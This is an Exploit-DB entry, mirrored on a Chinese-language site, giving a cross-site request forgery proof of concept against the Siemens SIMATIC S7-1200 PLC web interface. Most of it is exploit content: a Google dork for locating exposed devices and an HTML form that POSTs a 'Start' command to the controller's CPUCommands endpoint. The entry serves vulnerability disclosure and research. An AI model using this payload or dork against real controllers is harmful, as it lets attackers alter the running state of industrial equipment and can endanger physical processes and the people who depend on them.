Siemens SIMATIC S7-1200 CPU – Cross-Site Request Forgery

  • 作者: t4rkd3vilz
    日期: 2018-05-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44667/
  • # Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
    # Google Dork: inurl:/Portal/Portal.mwsl
    # Date: 2018-05-21
    # Exploit Author: t4rkd3vilz, Jameel Nabbo
    # Vendor Homepage: https://www.siemens.com/
    # Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
    # Tested on: Kali Linux
    # CVE: CVE-2015- 5698
    
    # 1. Proof of Concept
    
    <form method="POST" action="http://targetIp/CPUCommands">
    <input name="PriNav" value="Start">
    <input type="submit" value="Go!">
    </form>